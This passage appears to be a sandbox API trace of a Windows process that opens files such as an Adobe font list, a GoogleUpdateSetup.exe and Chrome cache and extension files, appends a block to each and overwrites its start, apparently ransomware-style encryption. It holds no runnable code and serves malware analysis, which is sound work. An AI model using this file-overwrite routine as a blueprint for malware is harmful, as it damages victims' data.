lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.945] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.945] ReleaseMutex (hMutex=0x168) returned 1 [0161.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0161.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0161.945] ReadFile (in: hFile=0x1fc, lpBuffer=0x284f988, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x284f988*, lpNumberOfBytesRead=0x2fdf2bc*=0x28e, lpOverlapped=0x0) returned 1 [0161.947] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0161.947] WriteFile (in: hFile=0x1fc, lpBuffer=0x3cfcae8*, nNumberOfBytesToWrite=0x816, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfcae8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x816, lpOverlapped=0x0) returned 1 [0161.947] CloseHandle (hObject=0x1fc) returned 1 [0161.948] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.949] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.950] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29a [0161.950] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.950] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.950] ReleaseMutex (hMutex=0x168) returned 1 [0161.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0161.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0161.951] ReadFile (in: hFile=0x1fc, lpBuffer=0x284f988, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x284f988*, lpNumberOfBytesRead=0x2fdf2bc*=0x29a, lpOverlapped=0x0) returned 1 [0161.952] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0161.952] WriteFile (in: hFile=0x1fc, lpBuffer=0x3cfcae8*, nNumberOfBytesToWrite=0x822, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfcae8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x822, lpOverlapped=0x0) returned 1 [0161.953] CloseHandle (hObject=0x1fc) returned 1 [0161.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0161.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x892c [0161.954] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0161.955] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.955] ReleaseMutex (hMutex=0x168) returned 1 [0161.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCMapFnt10.lst", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0161.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCMapFnt10.lst", cchWideChar=18, lpMultiByteStr=0x1f88bcc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCMapFnt10.lst", lpUsedDefaultChar=0x0) returned 18 [0161.955] ReadFile (in: hFile=0x1fc, lpBuffer=0x284f968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0161.968] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x792c [0161.969] ReadFile (in: hFile=0x1fc, lpBuffer=0x286fee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0162.013] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x792c [0162.013] WriteFile (in: hFile=0x1fc, lpBuffer=0x286fee8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.014] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0162.014] WriteFile (in: hFile=0x1fc, lpBuffer=0x284f968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.014] CloseHandle (hObject=0x1fc) returned 1 [0162.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0162.017] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.017] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x113f58 [0162.017] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.017] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.017] ReleaseMutex (hMutex=0x168) returned 1 [0162.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GoogleUpdateSetup.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0162.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GoogleUpdateSetup.exe", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GoogleUpdateSetup.exe", lpUsedDefaultChar=0x0) returned 21 [0162.018] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d00af8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0162.124] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d00af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0162.137] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x112f58 [0162.137] ReadFile (in: hFile=0x1fc, lpBuffer=0x286fee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0162.176] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x112f58 [0162.176] WriteFile (in: hFile=0x1fc, lpBuffer=0x286fee8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.177] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0162.177] WriteFile (in: hFile=0x1fc, lpBuffer=0x3d00af8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0162.179] WriteFile (in: hFile=0x1fc, lpBuffer=0x3d00af8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.179] CloseHandle (hObject=0x1fc) returned 1 [0162.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0162.180] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.181] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3ad3 [0162.181] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.181] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.181] ReleaseMutex (hMutex=0x168) returned 1 [0162.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0162.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", cchWideChar=68, lpMultiByteStr=0x1fac8c4, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpUsedDefaultChar=0x0) returned 68 [0162.181] ReadFile (in: hFile=0x1fc, lpBuffer=0x286fee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0162.181] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2ad3 [0162.182] ReadFile (in: hFile=0x1fc, lpBuffer=0x286fee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286fee8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0162.182] CloseHandle (hObject=0x1fc) returned 1 [0162.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0162.192] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.192] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x402000 [0162.192] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0162.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.192] ReleaseMutex (hMutex=0x168) returned 1 [0162.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_3", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0162.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_3", cchWideChar=6, lpMultiByteStr=0x1f7ad44, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="data_3", lpUsedDefaultChar=0x0) returned 6 [0162.193] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d00af8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0162.823] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d00af8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0162.839] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d00af8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x3d00af8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0162.839] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x400000 [0162.839] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0162.842] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x400000 [0162.842] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a9ba8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a9ba8*, lpNumberOfBytesWritten=0x2fdf28c*=0x2588, lpOverlapped=0x0) returned 1 [0167.575] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0167.576] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0167.576] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0167.576] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0x2000, lpOverlapped=0x0) returned 1 [0167.577] CloseHandle (hObject=0x1fc) returned 1 [0167.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0167.578] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.578] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10 [0167.578] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.579] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.579] ReleaseMutex (hMutex=0x168) returned 1 [0167.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0167.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CURRENT", lpUsedDefaultChar=0x0) returned 7 [0167.579] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f73408, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f73408*, lpNumberOfBytesRead=0x2fdf2bc*=0x10, lpOverlapped=0x0) returned 1 [0167.580] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0167.581] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x598, lpOverlapped=0x0) returned 1 [0167.581] CloseHandle (hObject=0x1fc) returned 1 [0167.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0167.582] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5c [0167.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.583] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.583] ReleaseMutex (hMutex=0x168) returned 1 [0167.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0167.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.html", lpUsedDefaultChar=0x0) returned 9 [0167.583] ReadFile (in: hFile=0x1fc, lpBuffer=0x1fbad08, nNumberOfBytesToRead=0x5c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad08*, lpNumberOfBytesRead=0x2fdf2bc*=0x5c, lpOverlapped=0x0) returned 1 [0167.584] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0167.585] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5e4, lpOverlapped=0x0) returned 1 [0167.585] CloseHandle (hObject=0x1fc) returned 1 [0167.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0167.586] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.587] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xea [0167.587] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0167.587] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.587] ReleaseMutex (hMutex=0x168) returned 1 [0167.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.587] ReadFile (in: hFile=0x1fc, 